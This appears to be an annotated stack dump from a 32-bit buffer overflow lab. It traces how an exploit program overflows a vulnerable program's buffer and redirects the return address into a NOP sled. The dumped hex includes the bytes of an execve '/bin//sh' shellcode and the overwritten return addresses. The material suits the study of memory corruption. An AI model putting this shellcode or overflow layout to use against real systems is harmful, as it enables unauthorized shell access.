buffer[498] @ 0x804a1fa = 0xff
buffer[499] @ 0x804a1fb = 0xbf
buffer[500] @ 0x804a1fc = 0xfc
buffer[501] @ 0x804a1fd = 0xf9
buffer[502] @ 0x804a1fe = 0xff
buffer[503] @ 0x804a1ff = 0xbf
buffer[504] @ 0x804a200 = 0xfc
buffer[505] @ 0x804a201 = 0xf9
buffer[506] @ 0x804a202 = 0xff
buffer[507] @ 0x804a203 = 0xbf
buffer[508] @ 0x804a204 = 0xfc
buffer[509] @ 0x804a205 = 0xf9
buffer[510] @ 0x804a206 = 0xff
buffer[511] @ 0x804a207 = 0xbf
buffer[512] @ 0x804a208 = 0xfc
buffer[513] @ 0x804a209 = 0xf9
buffer[514] @ 0x804a20a = 0xff
buffer[515] @ 0x804a20b = 0xbf
buffer[516] @ 0x804a20c = 0xfc
buffer[517] @ 0x804a20d = 0xf9
buffer[518] @ 0x804a20e = 0xff
buffer[519] @ 0x804a20f = 0xbf
buffer[520] @ 0x804a210 = 0xfc
buffer[521] @ 0x804a211 = 0xf9
buffer[522] @ 0x804a212 = 0xff
buffer[523] @ 0x804a213 = 0xbf
buffer[524] @ 0x804a214 = 0xfc
buffer[525] @ 0x804a215 = 0xf9
buffer[526] @ 0x804a216 = 0xff
buffer[527] @ 0x804a217 = 0xbf
buffer[528] @ 0x804a218 = 0xfc
buffer[529] @ 0x804a219 = 0xf9
buffer[530] @ 0x804a21a = 0xff
buffer[531] @ 0x804a21b = 0xbf
buffer[532] @ 0x804a21c = 0xfc
buffer[533] @ 0x804a21d = 0xf9
buffer[534] @ 0x804a21e = 0xff
buffer[535] @ 0x804a21f = 0xbf
buffer[536] @ 0x804a220 = 0xfc
buffer[537] @ 0x804a221 = 0xf9
buffer[538] @ 0x804a222 = 0xff
buffer[539] @ 0x804a223 = 0xbf
buffer[540] @ 0x804a224 = 0xfc
buffer[541] @ 0x804a225 = 0xf9
buffer[542] @ 0x804a226 = 0xff
buffer[543] @ 0x804a227 = 0xbf
buffer[544] @ 0x804a228 = 0xfc
buffer[545] @ 0x804a229 = 0xf9
buffer[546] @ 0x804a22a = 0xff
buffer[547] @ 0x804a22b = 0xbf
buffer[548] @ 0x804a22c = 0xfc
buffer[549] @ 0x804a22d = 0xf9
buffer[550] @ 0x804a22e = 0xff
buffer[551] @ 0x804a22f = 0xbf
buffer[552] @ 0x804a230 = 0xfc
buffer[553] @ 0x804a231 = 0xf9
buffer[554] @ 0x804a232 = 0xff
buffer[555] @ 0x804a233 = 0xbf
buffer[556] @ 0x804a234 = 0xfc
buffer[557] @ 0x804a235 = 0xf9
buffer[558] @ 0x804a236 = 0xff
buffer[559] @ 0x804a237 = 0xbf
buffer[560] @ 0x804a238 = 0xfc
buffer[561] @ 0x804a239 = 0xf9
buffer[562] @ 0x804a23a = 0xff
buffer[563] @ 0x804a23b = 0xbf
buffer[564] @ 0x804a23c = 0xfc
buffer[565] @ 0x804a23d = 0xf9
buffer[566] @ 0x804a23e = 0xff
buffer[567] @ 0x804a23f = 0xbf
buffer[568] @ 0x804a240 = 0xfc
buffer[569] @ 0x804a241 = 0xf9
buffer[570] @ 0x804a242 = 0xff
buffer[571] @ 0x804a243 = 0xbf
buffer[572] @ 0x804a244 = 0xfc
buffer[573] @ 0x804a245 = 0xf9
buffer[574] @ 0x804a246 = 0xff
buffer[575] @ 0x804a247 = 0xbf
buffer[576] @ 0x804a248 = 0xfc
buffer[577] @ 0x804a249 = 0xf9
buffer[578] @ 0x804a24a = 0xff
buffer[579] @ 0x804a24b = 0xbf
buffer[580] @ 0x804a24c = 0xfc
buffer[581] @ 0x804a24d = 0xf9
buffer[582] @ 0x804a24e = 0xff
buffer[583] @ 0x804a24f = 0xbf
buffer[584] @ 0x804a250 = 0xfc
buffer[585] @ 0x804a251 = 0xf9
buffer[586] @ 0x804a252 = 0xff
buffer[587] @ 0x804a253 = 0xbf
buffer[588] @ 0x804a254 = 0xfc
buffer[589] @ 0x804a255 = 0xf9
buffer[590] @ 0x804a256 = 0xff
buffer[591] @ 0x804a257 = 0xbf
buffer[592] @ 0x804a258 = 0xfc
buffer[593] @ 0x804a259 = 0xf9
buffer[594] @ 0x804a25a = 0xff
buffer[595] @ 0x804a25b = 0xbf
buffer[596] @ 0x804a25c = 0xfc
buffer[597] @ 0x804a25d = 0xf9
buffer[598] @ 0x804a25e = 0xff
buffer[599] @ 0x804a25f = 0x00
// Start of vuln-32.
&argv[1] = 0xbffff838: 0xbffff94a
&argv = 0xbffff7b4
&argc = 0xbffff7b0
// Stack frame for main().
0xbffff7a8: main() ebp
0xbffff7a8: 0xbffff808
0xbffff7a4: 0xbffff7a4 // &i = 0xbffff7a4: 0xbffff78c.
0xbffff7a0: 0xbffff7a8 // &ebp = 0xbffff7a0: 0xbffff7a8.
0xbffff79c: 0xb7fd6ff4
0xbffff798: 0xb7fd6ff4
0xbffff794: 0xbffff798 // copy_wrapper() argument &parent_esp = 0xbffff794: 0xbffff94a.
0xbffff790: 0x08048b40
0xbffff790: main() esp
// Start of stack frame for copy_wrapper().
0xbffff790: 0xbffff94a // copy_wrapper() argument &src = 0xbffff790: 0xbffff94a.
0xbffff78c: 0x08048a2b // main() return address (EIP).
0xbffff788: copy_wrapper() ebp
0xbffff788: 0xbffff7a8
0xbffff784: 0xb7fd6ff4
0xbffff780: 0xbffff794
0xbffff77c: 0xbffff788 // copy_wrapper() &ebp = 0xbffff77c: 0xbffff7a8.
0xbffff778: 0x08048c1e
0xbffff774: 0xb7fd74c0
0xbffff770: 0xb7edf653
0xbffff76c: 0xbffff788
0xbffff768: 0x00000000
0xbffff764: 0xb8000ce0
0xbffff760: 0x41414141 // copy_wrapper() &buffer end.
0xbffff75c: 0x00000000
0xbffff758: 0x00000000
0xbffff754: 0x00000000
0xbffff750: 0x00000000
0xbffff74c: 0x00000000
0xbffff748: 0x00000000
0xbffff744: 0x00000000
0xbffff740: 0x00000000
0xbffff73c: 0x00000000
0xbffff738: 0x00000000
0xbffff734: 0x00000000
0xbffff730: 0x00000000
0xbffff72c: 0x00000000
0xbffff728: 0x00000000
0xbffff724: 0x00000000
0xbffff720: 0x00000000
0xbffff71c: 0x00000000
0xbffff718: 0x00000000
0xbffff714: 0x00000000
0xbffff710: 0x00000000
0xbffff70c: 0x00000000
0xbffff708: 0x00000000
0xbffff704: 0x00000000
0xbffff700: 0x00000000
0xbffff6fc: 0x00000000
0xbffff6f8: 0x00000000
0xbffff6f4: 0x00000000
0xbffff6f0: 0x00000000
0xbffff6ec: 0x00000000
0xbffff6e8: 0x00000000
0xbffff6e4: 0x00000000
0xbffff6e0: 0x00000000
0xbffff6dc: 0x00000000
0xbffff6d8: 0x00000000
0xbffff6d4: 0x00000000
0xbffff6d0: 0x00000000
0xbffff6cc: 0x00000000
0xbffff6c8: 0x00000000
0xbffff6c4: 0x00000000
0xbffff6c0: 0x00000000
0xbffff6bc: 0x00000000
0xbffff6b8: 0x00000000
0xbffff6b4: 0x00000000
0xbffff6b0: 0x00000000
0xbffff6ac: 0x00000000
0xbffff6a8: 0x00000000
0xbffff6a4: 0x00000000
0xbffff6a0: 0x00000000
0xbffff69c: 0x00000000
0xbffff698: 0x00000000
0xbffff694: 0x00000000
0xbffff690: 0x00000000
0xbffff68c: 0x00000000
0xbffff688: 0x00000000
0xbffff684: 0x00000000
0xbffff680: 0x00000000
0xbffff67c: 0x00000000
0xbffff678: 0x00000000
0xbffff674: 0x00000000
0xbffff670: 0x00000000
0xbffff66c: 0x00000000
0xbffff668: 0x00000000
0xbffff664: 0x00000000
0xbffff660: 0x00000000
0xbffff65c: 0x00000000
0xbffff658: 0x00000000
0xbffff654: 0x00000000
0xbffff650: 0x00000000
0xbffff64c: 0x00000000
0xbffff648: 0x00000000
0xbffff644: 0x00000000
0xbffff640: 0x00000000
0xbffff63c: 0x00000000
0xbffff638: 0x00000000
0xbffff634: 0x00000000
0xbffff630: 0x00000000
0xbffff62c: 0x00000000
0xbffff628: 0x00000000
0xbffff624: 0x00000000
0xbffff620: 0x00000000
0xbffff61c: 0x00000000
0xbffff618: 0x00000000
0xbffff614: 0x00000000
0xbffff610: 0x00000000
0xbffff60c: 0x00000000
0xbffff608: 0x00000000
0xbffff604: 0x00000000
0xbffff600: 0x00000000
0xbffff5fc: 0x00000000
0xbffff5f8: 0x00000000
0xbffff5f4: 0x00000000
0xbffff5f0: 0x00000000
0xbffff5ec: 0x00000000
0xbffff5e8: 0x00000000
0xbffff5e4: 0x00000000
0xbffff5e0: 0x00000000
0xbffff5dc: 0x00000000
0xbffff5d8: 0x00000000
0xbffff5d4: 0x00000000
0xbffff5d0: 0x00000000
0xbffff5cc: 0x00000000
0xbffff5c8: 0x00000000
0xbffff5c4: 0x00000000
0xbffff5c0: 0x00000000
0xbffff5bc: 0x00000000
0xbffff5b8: 0x00000000
0xbffff5b4: 0x00000000
0xbffff5b0: 0x00000000
0xbffff5ac: 0x00000000
0xbffff5a8: 0x00000000
0xbffff5a4: 0x00000000
0xbffff5a0: 0x00000000
0xbffff59c: 0x00000000
0xbffff598: 0x00000000
0xbffff594: 0x00000000
0xbffff590: 0x00000000
0xbffff58c: 0x00000000
0xbffff588: 0x00000000
0xbffff584: 0x00000000
0xbffff580: 0x00000000
0xbffff57c: 0x00000000
0xbffff578: 0x00000000
0xbffff574: 0x00000000
0xbffff570: 0x41414141 // copy_wrapper() &buffer = 0xbffff570
0xbffff56c: 0x00040000 // copy_wrapper() &a = 0xbffff56e: 0x4
0xbffff568: 0xbffff568 // copy_wrapper() &i = 0xbffff568: 0x080487f7
0xbffff564: 0xbffff788 // copy_wrapper() &j = 0xbffff564: 0xbffff7a8
0xbffff560: 0x00000000
0xbffff55c: 0x00000018 // mem_copy() argument &parent_esp = 0xbffff55c: 0xbffff570
0xbffff558: 0x00000018
0xbffff554: 0xbffff558 // mem_copy() argument &src = 0xbffff554: 0xbffff94a
0xbffff550: 0x08048b40 // mem_copy() argument &dest = 0xbffff550: 0xbffff570
0xbffff550: copy_wrapper() esp
// Start of stack frame for mem_copy()
0xbffff550: 0xbffff570 // mem_copy() argument &dest = 0xbffff550: 0xbffff570 (copy_wrapper &buffer)
0xbffff54c: 0x08048873 // copy_wrapper() return address (EIP)
0xbffff548: mem_copy() ebp
0xbffff548: 0xbffff788
0xbffff544: 0xb7fd6ff4
0xbffff540: 0x02587bf0 // mem_copy() &len = 0xbffff542: 0x258
0xbffff53c: 0xbffff548 // mem_copy() &ebp = 0xbffff53c: 0xbffff788
0xbffff538: 0xbffff538 // mem_copy() &i = 0xbffff538: 0x080484e7
0xbffff534: 0xbffff548 // mem_copy() &j = 0xbffff534: 0xbffff788
0xbffff530: 0xbffff788 // mem_copy() &a = 0xbffff532: 0xbfff
0xbffff52c: 0x00000000
0xbffff528: 0x00000000
0xbffff524: 0xbffff528
0xbffff520: 0x08048b40
0xbffff520: mem_copy() esp
Buffer copied.
0xbffffd40: 0x65706a2e
0xbffffd3c: 0x2a3a3533
0xbffffd38: 0x3b31303d
0xbffffd34: 0x67706a2e
0xbffffd30: 0x2a3a3133
0xbffffd2c: 0x3b31303d
0xbffffd28: 0x72616a2e
0xbffffd24: 0x2a3a3133
0xbffffd20: 0x3b31303d
0xbffffd1c: 0x6d70722e
0xbffffd18: 0x2a3a3133
0xbffffd14: 0x3b31303d
0xbffffd10: 0x6265642e
0xbffffd0c: 0x2a3a3133
0xbffffd08: 0x3b31303d
0xbffffd04: 0x327a622e
0xbffffd00: 0x2a3a3133
0xbffffcfc: 0x3b31303d
0xbffffcf8: 0x7a672e2a
0xbffffcf4: 0x3a31333b
0xbffffcf0: 0x31303d5a
0xbffffcec: 0x2e2a3a31
0xbffffce8: 0x333b3130
0xbffffce4: 0x3d7a2e2a
0xbffffce0: 0x3a31333b
0xbffffcdc: 0x31303d70
0xbffffcd8: 0x697a2e2a
0xbffffcd4: 0x3a31333b
0xbffffcd0: 0x31303d68
0xbffffccc: 0x7a6c2e2a
0xbffffcc8: 0x3a31333b
0xbffffcc4: 0x31303d7a
0xbffffcc0: 0x61742e2a
0xbffffcbc: 0x3a31333b
0xbffffcb8: 0x31303d6a
0xbffffcb4: 0x72612e2a
0xbffffcb0: 0x3a31333b
0xbffffcac: 0x31303d7a
0xbffffca8: 0x67742e2a
0xbffffca4: 0x3a31333b
0xbffffca0: 0x31303d72
0xbffffc9c: 0x61742e2a
0xbffffc98: 0x3a32333b
0xbffffc94: 0x31303d78
0xbffffc90: 0x653a3434
0xbffffc8c: 0x3b37333d
0xbffffc88: 0x74733a32
0xbffffc84: 0x343b3433
0xbffffc80: 0x3d776f3a
0xbffffc7c: 0x32343b30
0xbffffc78: 0x333d7774
0xbffffc74: 0x3a33343b
0xbffffc70: 0x30333d67
0xbffffc6c: 0x733a3134
0xbffffc68: 0x3b37333d
0xbffffc64: 0x75733a31
0xbffffc60: 0x303b3133
0xbffffc5c: 0x3b30343d
0xbffffc58: 0x726f3a31
0xbffffc54: 0x303b3333
0xbffffc50: 0x3b30343d
0xbffffc4c: 0x64633a31
0xbffffc48: 0x303b3333
0xbffffc44: 0x3b30343d
0xbffffc40: 0x64623a35
0xbffffc3c: 0x333b3130
0xbffffc38: 0x3d6f643a
0xbffffc34: 0x35333b31
0xbffffc30: 0x303d6f73
0xbffffc2c: 0x3a33333b
0xbffffc28: 0x30343d69
0xbffffc24: 0x703a3633
0xbffffc20: 0x3b31303d
0xbffffc1c: 0x6e6c3a34
0xbffffc18: 0x333b3130
0xbffffc14: 0x3d69643a
0xbffffc10: 0x30303d69
0xbffffc0c: 0x663a3030
0xbffffc08: 0x3d6f6e3d
0xbffffc04: 0x53524f4c
0xbffffc00: 0x4f435f53
0xbffffbfc: 0x4c007965
0xbffffbf8: 0x6c736e65
0xbffffbf4: 0x623d5245
0xbffffbf0: 0x53550031
0xbffffbec: 0x2f737470
0xbffffbe8: 0x2f766564
0xbffffbe4: 0x2f3d5954
0xbffffbe0: 0x545f4853
0xbffffbdc: 0x53003232
0xbffffbd8: 0x20323937
0xbffffbd4: 0x34342038
0xbffffbd0: 0x37312e31
0xbffffbcc: 0x2e383631
0xbffffbc8: 0x2e323931
0xbffffbc4: 0x3d544e45
0xbffffbc0: 0x494c435f
0xbffffbbc: 0x48535300
0xbffffbb8: 0x68736162
0xbffffbb4: 0x2f6e6962
0xbffffbb0: 0x2f3d4c4c
0xbffffbac: 0x45485300
0xbffffba8: 0x6d726574
0xbffffba4: 0x783d4d52
0xbffffba0: 0x455400ff
0xbffffb9c: 0xf9fcbfff // End of vuln-32.c argv[1]
0xbffffb98: 0xf9fcbfff
0xbffffb94: 0xf9fcbfff
0xbffffb90: 0xf9fcbfff
0xbffffb8c: 0xf9fcbfff
0xbffffb88: 0xf9fcbfff
0xbffffb84: 0xf9fcbfff
0xbffffb80: 0xf9fcbfff
0xbffffb7c: 0xf9fcbfff
0xbffffb78: 0xf9fcbfff
0xbffffb74: 0xf9fcbfff
0xbffffb70: 0xf9fcbfff
0xbffffb6c: 0xf9fcbfff
0xbffffb68: 0xf9fcbfff
0xbffffb64: 0xf9fcbfff
0xbffffb60: 0xf9fcbfff
0xbffffb5c: 0xf9fcbfff
0xbffffb58: 0xf9fcbfff
0xbffffb54: 0xf9fcbfff
0xbffffb50: 0xf9fcbfff
0xbffffb4c: 0xf9fcbfff
0xbffffb48: 0xf9fcbfff
0xbffffb44: 0xf9fcbfff
0xbffffb40: 0xf9fcbfff
0xbffffb3c: 0xf9fcbfff
0xbffffb38: 0xf9fcbfff
0xbffffb34: 0xf9fcbfff
0xbffffb30: 0xf9fcbfff
0xbffffb2c: 0xf9fcbfff
0xbffffb28: 0xf9fcbfff
0xbffffb24: 0xf9fcbfff
0xbffffb20: 0xf9fcbfff
0xbffffb1c: 0xf9fcbfff
0xbffffb18: 0xf9fcbfff
0xbffffb14: 0xf9fcbfff
0xbffffb10: 0xf9fcbfff
0xbffffb0c: 0xf9fcbfff
0xbffffb08: 0xf9fcbfff
0xbffffb04: 0xf9fcbfff
0xbffffb00: 0xf9fcbfff
0xbffffafc: 0xf9fcbfff
0xbffffaf8: 0xf9fcbfff
0xbffffaf4: 0xf9fcbfff
0xbffffaf0: 0xf9fcbfff
0xbffffaec: 0xf9fcbfff
0xbffffae8: 0xf9fcbfff
0xbffffae4: 0xf9fcbfff
0xbffffae0: 0xf9fcbfff
0xbffffadc: 0xf9fcbfff
0xbffffad8: 0xf9fcbfff
0xbffffad4: 0xf9fcbfff
0xbffffad0: 0xf9fcbfff
0xbffffacc: 0xf9fcbfff
0xbffffac8: 0xf9fcbfff
0xbffffac4: 0xf9fcbfff
0xbffffac0: 0xf9fcbfff
0xbffffabc: 0xf9fcbfff
0xbffffab8: 0xf9fcbfff
0xbffffab4: 0xf9fcbfff
0xbffffab0: 0xf9fcbfff
0xbffffaac: 0xf9fcbfff
0xbffffaa8: 0xf9fcbfff
0xbffffaa4: 0xf9fcbfff
0xbffffaa0: 0xf9fcbfff
0xbffffa9c: 0xf9fcbfff
0xbffffa98: 0xf9fcbfff
0xbffffa94: 0xf9fcbfff
0xbffffa90: 0xf9fcbfff
0xbffffa8c: 0xf9fcbfff
0xbffffa88: 0xf9fcbfff
0xbffffa84: 0xf9fcbfff
0xbffffa80: 0xf9fcbfff
0xbffffa7c: 0xf9fcbfff
0xbffffa78: 0xf9fcbfff
0xbffffa74: 0xf9fcbfff
0xbffffa70: 0xf9fcbfff
0xbffffa6c: 0xf9fcbfff
0xbffffa68: 0xf9fcbfff
0xbffffa64: 0xf9fcbfff
0xbffffa60: 0xf9fcbfff
0xbffffa5c: 0xf9fcbfff
0xbffffa58: 0xf9fcbfff
0xbffffa54: 0xf9fcbfff
0xbffffa50: 0xf9fcbfff
0xbffffa4c: 0xf9fcbfff
0xbffffa48: 0xf9fcbfff
0xbffffa44: 0xf9fcbfff
0xbffffa40: 0xf9fcbfff
0xbffffa3c: 0xf9fcbfff
0xbffffa38: 0xf9fcbfff
0xbffffa34: 0xf9fcbfff
0xbffffa30: 0xf980cde1
0xbffffa2c: 0x895352e3
0xbffffa28: 0x896e6962
0xbffffa24: 0x2f686873
0xbffffa20: 0x2f2f6852
0xbffffa1c: 0x580b6ad2
0xbffffa18: 0x3180cdc9
0xbffffa14: 0x31db3158
0xbffffa10: 0x466a9090
0xbffffa0c: 0x90909090
0xbffffa08: 0x90909090
0xbffffa04: 0x90909090
0xbffffa00: 0x90909090
0xbffff9fc: 0x90909090 // exploit-32.c &buffer was here, that process is gone now.
// This is where the main EIP now points to.
0xbffff9f8: 0x90909090
0xbffff9f4: 0x90909090
0xbffff9f0: 0x90909090
0xbffff9ec: 0x90909090
0xbffff9e8: 0x90909090
0xbffff9e4: 0x90909090
0xbffff9e0: 0x90909090
0xbffff9dc: 0x90909090
0xbffff9d8: 0x90909090
0xbffff9d4: 0x90909090
0xbffff9d0: 0x90909090
0xbffff9cc: 0x90909090
0xbffff9c8: 0x90909090
0xbffff9c4: 0x90909090
0xbffff9c0: 0x90909090
0xbffff9bc: 0x90909090
0xbffff9b8: 0x90909090
0xbffff9b4: 0x90909090
0xbffff9b0: 0x90909090
0xbffff9ac: 0x90909090
0xbffff9a8: 0x90909090
0xbffff9a4: 0x90909090
0xbffff9a0: 0x90909090
0xbffff99c: 0x90909090
0xbffff998: 0x90909090
0xbffff994: 0x90909090
0xbffff990: 0x90909090
0xbffff98c: 0x90909090
0xbffff988: 0x90909090
0xbffff984: 0x90909090
0xbffff980: 0x90909090
0xbffff97c: 0x90909090
0xbffff978: 0x90909090
0xbffff974: 0x90909090
0xbffff970: 0x90909090
0xbffff96c: 0x90909090
0xbffff968: 0x90909090
0xbffff964: 0x90909090
0xbffff960: 0x90909090
0xbffff95c: 0x90909090
0xbffff958: 0x90909090
0xbffff954: 0x90909090
0xbffff950: 0x90909090
0xbffff94c: 0x90909090
0xbffff948: 0x9090006c // Start of vuln-32.c argv[1]
0xbffff940: 0x2d6e6c75
0xbffff93c: 0x76000000
0xbffff938: 0x00000000
0xbffff934: 0x00000000
0xbffff930: 0x00000000
0xbffff92c: 0x00363836
0xbffff928: 0x69000000
0xbffff924: 0x00000000
0xbffff920: 0x00000000
0xbffff91c: 0x00000000
0xbffff918: 0x00000000
0xbffff914: 0xbffff92b
0xbffff910: 0x0000000f
0xbffff90c: 0x00000001
0xbffff908: 0x00000017
0xbffff904: 0x00000000
0xbffff900: 0x0000000e
0xbffff8fc: 0x000003e8
0xbffff8f8: 0x0000000d
0xbffff8f4: 0x00000000
0xbffff8f0: 0x0000000c
0xbffff8ec: 0x000003e8
0xbffff8e8: 0x0000000b
0xbffff8e4: 0x080482f0
0xbffff8e0: 0x00000009
0xbffff8dc: 0x00000000
0xbffff8d8: 0x00000008
0xbffff8d4: 0xb7fe7000
0xbffff8d0: 0x00000007
0xbffff8cc: 0x00000007
0xbffff8c8: 0x00000005
0xbffff8c4: 0x00000020
0xbffff8c0: 0x00000004
0xbffff8bc: 0x08048034
0xbffff8b8: 0x00000003
0xbffff8b4: 0x00000064
0xbffff8b0: 0x00000011
0xbffff8ac: 0x00001000
0xbffff8a8: 0x00000006
0xbffff8a4: 0x178bfbff
0xbffff8a0: 0x00000010
0xbffff89c: 0xffffe000
0xbffff898: 0x00000021
0xbffff894: 0xffffe400
0xbffff890: 0x00000020
0xbffff88c: 0x00000000
0xbffff888: 0xbfffffcf
0xbffff884: 0xbfffffba
0xbffff880: 0xbfffff98
0xbffff87c: 0xbfffff78
0xbffff878: 0xbfffff45
0xbffff874: 0xbfffff35
0xbffff870: 0xbfffff22
0xbffff86c: 0xbfffff1a
0xbffff868: 0xbfffff03
0xbffff864: 0xbffffef2
0xbffff860: 0xbffffede
0xbffff85c: 0xbffffe91
0xbffff858: 0xbffffe7a
0xbffff854: 0xbffffbff
0xbffff850: 0xbffffbf2
0xbffff84c: 0xbffffbdf
0xbffff848: 0xbffffbbd
0xbffff844: 0xbffffbad
0xbffff840: 0xbffffba2
0xbffff83c: 0x00000000
0xbffff838: 0xbffff94a // vuln-32.c &argv[1]
0xbffff834: 0xbffff93f
0xbffff830: 0x00000002
0xbffff82c: 0xb7ffe9fd
0xbffff828: 0xbffff82c
0xbffff824: 0xb7ff47b0
0xbffff820: 0x08048a40
0xbffff81c: 0x08048a50
0xbffff818: 0xbffff834
0xbffff814: 0x00000002
0xbffff810: 0x08048918
0xbffff80c: 0x08048311
0xbffff808: 0x00000000
0xbffff804: 0x080482f0
0xbffff800: 0x00000002
0xbffff7fc: 0xb8000ff4
0xbffff7f8: 0xb7eafded
0xbffff7f4: 0xb7ff9300
0xbffff7f0: 0x00000000
0xbffff7ec: 0x00000000
0xbffff7e8: 0x00000000
0xbffff7e4: 0x48e0fe81
0xbffff7e0: 0x40f5f7b0
0xbffff7dc: 0xbffff808
0xbffff7d8: 0x00000000
0xbffff7d4: 0xb8000ce0
0xbffff7d0: 0xb7fd6ff4
0xbffff7cc: 0x00000000
0xbffff7c8: 0x00000001
0xbffff7c4: 0x00fff9fc
0xbffff7c0: 0xbffff9fc
0xbffff7bc: 0xbffff9fc
0xbffff7b8: 0xbffff9fc
0xbffff7b4: 0xbffff9fc // vuln-32.c &argv
0xbffff7b0: 0xbffff9fc // vuln-32.c &argc
0xbffff7ac: 0xbffff9fc
0xbffff7a8: 0xbffff9fc // main() EBP.
0xbffff7a4: 0xbffff9fc
0xbffff7a0: 0xbffff9fc
0xbffff79c: 0xbffff9fc
0xbffff798: 0xbffff9fc
0xbffff794: 0xbffff9fc
0xbffff790: 0xbffff9fc // main() ESP.
0xbffff78c: 0xbffff9fc // main() return address (EIP) has been overwritten and
// now points to the original address of the heap pointer
// from exploit-32.c which was called "buffer". That pointer
// was removed from the stack when execl() was called but
// the exploit string was copied to the stack in roughly
// the same location as an argument for vuln-32. So this
// is now pointing to roughly a quater of the way into
// argv[1] where the NOP sled is.
0xbffff788: 0xbffff9fc // copy_wrapper EBP.
0xbffff784: 0xbffff9fc
0xbffff780: 0xbffff9fc
0xbffff77c: 0xbffff9fc // copy_wrapper() &ebp.
0xbffff778: 0xbffff9fc
0xbffff774: 0xbffff9fc
0xbffff770: 0xbffff9fc
0xbffff76c: 0xbffff9fc
0xbffff768: 0xbffff9fc
0xbffff764: 0xbffff9fc
0xbffff760: 0xbffff9fc // End of copy_wrapper() &buffer.
0xbffff75c: 0xbffff9fc
0xbffff758: 0xbffff9fc
0xbffff754: 0xbffff9fc
0xbffff750: 0xbffff9fc
0xbffff74c: 0xbffff9fc
0xbffff748: 0xbffff9fc
0xbffff744: 0xbffff9fc
0xbffff740: 0xbffff9fc
0xbffff73c: 0xbffff9fc
0xbffff738: 0xbffff9fc
0xbffff734: 0xbffff9fc
0xbffff730: 0xbffff9fc
0xbffff72c: 0xbffff9fc
0xbffff728: 0xbffff9fc
0xbffff724: 0xbffff9fc
0xbffff720: 0xbffff9fc
0xbffff71c: 0xbffff9fc
0xbffff718: 0xbffff9fc
0xbffff714: 0xbffff9fc
0xbffff710: 0xbffff9fc
0xbffff70c: 0xbffff9fc
0xbffff708: 0xbffff9fc
0xbffff704: 0xbffff9fc
0xbffff700: 0xbffff9fc
0xbffff6fc: 0xbffff9fc
0xbffff6f8: 0xbffff9fc
0xbffff6f4: 0xbffff9fc
0xbffff6f0: 0xbffff9fc
0xbffff6ec: 0xbffff9fc
0xbffff6e8: 0xbffff9fc
0xbffff6e4: 0xbffff9fc
0xbffff6e0: 0xbffff9fc
0xbffff6dc: 0xbffff9fc
0xbffff6d8: 0xbffff9fc
0xbffff6d4: 0xbffff9fc
0xbffff6d0: 0xbffff9fc
0xbffff6cc: 0xbffff9fc
0xbffff6c8: 0xbffff9fc
0xbffff6c4: 0xbffff9fc
0xbffff6c0: 0xbffff9fc
0xbffff6bc: 0xbffff9fc
0xbffff6b8: 0xbffff9fc
0xbffff6b4: 0xbffff9fc
0xbffff6b0: 0xbffff9fc
0xbffff6ac: 0xbffff9fc
0xbffff6a8: 0xbffff9fc
0xbffff6a4: 0xbffff9fc
0xbffff6a0: 0xbffff9fc
0xbffff69c: 0xbffff9fc
0xbffff698: 0xbffff9fc
0xbffff694: 0xbffff9fc
0xbffff690: 0xbffff9fc
0xbffff68c: 0xbffff9fc
0xbffff688: 0xbffff9fc
0xbffff684: 0xbffff9fc
0xbffff680: 0xbffff9fc
0xbffff67c: 0xbffff9fc
0xbffff678: 0xbffff9fc
0xbffff674: 0xbffff9fc
0xbffff670: 0xbffff9fc
0xbffff66c: 0xbffff9fc
0xbffff668: 0xbffff9fc
0xbffff664: 0xbffff9fc
0xbffff660: 0xbffff9fc
0xbffff65c: 0xbffff9fc
0xbffff658: 0xbffff980 // End of shell code with syscall 80
0xbffff654: 0xcde18953
0xbffff650: 0x52e3896e
0xbffff64c: 0x69622f68
0xbffff648: 0x68732f2f
0xbffff644: 0x6852580b
0xbffff640: 0x6ad23180
0xbffff63c: 0xcdc931db
0xbffff638: 0x3158466a // Start of shell code
0xbffff634: 0x90909090
0xbffff630: 0x90909090
0xbffff62c: 0x90909090
0xbffff628: 0x90909090
0xbffff624: 0x90909090
0xbffff620: 0x90909090
0xbffff61c: 0x90909090
0xbffff618: 0x90909090
0xbffff614: 0x90909090
0xbffff610: 0x90909090
0xbffff60c: 0x90909090
0xbffff608: 0x90909090
0xbffff604: 0x90909090
0xbffff600: 0x90909090
0xbffff5fc: 0x90909090
0xbffff5f8: 0x90909090
0xbffff5f4: 0x90909090
0xbffff5f0: 0x90909090
0xbffff5ec: 0x90909090
0xbffff5e8: 0x90909090
0xbffff5e4: 0x90909090
0xbffff5e0: 0x90909090
0xbffff5dc: 0x90909090
0xbffff5d8: 0x90909090
0xbffff5d4: 0x90909090
0xbffff5d0: 0x90909090
0xbffff5cc: 0x90909090
0xbffff5c8: 0x90909090
0xbffff5c4: 0x90909090
0xbffff5c0: 0x90909090
0xbffff5bc: 0x90909090
0xbffff5b8: 0x90909090
0xbffff5b4: 0x90909090
0xbffff5b0: 0x90909090
0xbffff5ac: 0x90909090
0xbffff5a8: 0x90909090
0xbffff5a4: 0x90909090
0xbffff5a0: 0x90909090
0xbffff59c: 0x90909090
0xbffff598: 0x90909090
0xbffff594: 0x90909090
0xbffff590: 0x90909090
0xbffff58c: 0x90909090
0xbffff588: 0x90909090
0xbffff584: 0x90909090
0xbffff580: 0x90909090
0xbffff57c: 0x90909090
0xbffff578: 0x90909090
0xbffff574: 0x90909090
0xbffff570: 0x90909090 // copy_wrapper() &buffer. Start of NOP sled.
0xbffff550: 0xbffff570 // copy_wrapper() ESP.
0xbffff54c: 0x08048873 // copy_wrapper() return address is correct so we can
0xbffff548: 0xbffff788 // return to copy_wrapper().
0xbffff544: 0xb7fd6ff4
0xbffff540: 0x02587bf0
0xbffff53c: 0xbffff548
0xbffff538: 0xbffff56c
0xbffff534: 0xbffff534
0xbffff530: 0x0258f788
0xbffff52c: 0x00000000
0xbffff528: 0x00000000
0xbffff524: 0xbffff528
0xbffff54c: copy_wrapper() return address (EIP) = 0x08048873.
returned to copy_wrapper()
// @ 0xbffff77c (which was storing the copy_wrapper() EBP) has been overwritten
// with the value 0xbffff9fc so dumping the stack from this address now down to
// the copy_wrapper() ESP shows the stack from the exploit-32.c program and into
// the vuln-32.c program:
0xbffffa00: main() ret addr* = 0x90909090 // copy_wrapper() &ebp+1
0xbffff9fc: main() esp
0xbffff9fc: 0x90909090 // &buffer within main() of exploit-32.c.
0xbffff9f8: 0x90909090
0xbffff9f4: 0x90909090
0xbffff9f0: 0x90909090
0xbffff9ec: 0x90909090
0xbffff9e8: 0x90909090
0xbffff9e4: 0x90909090
0xbffff9e0: 0x90909090
0xbffff9dc: 0x90909090
0xbffff9d8: 0x90909090
0xbffff9d4: 0x90909090
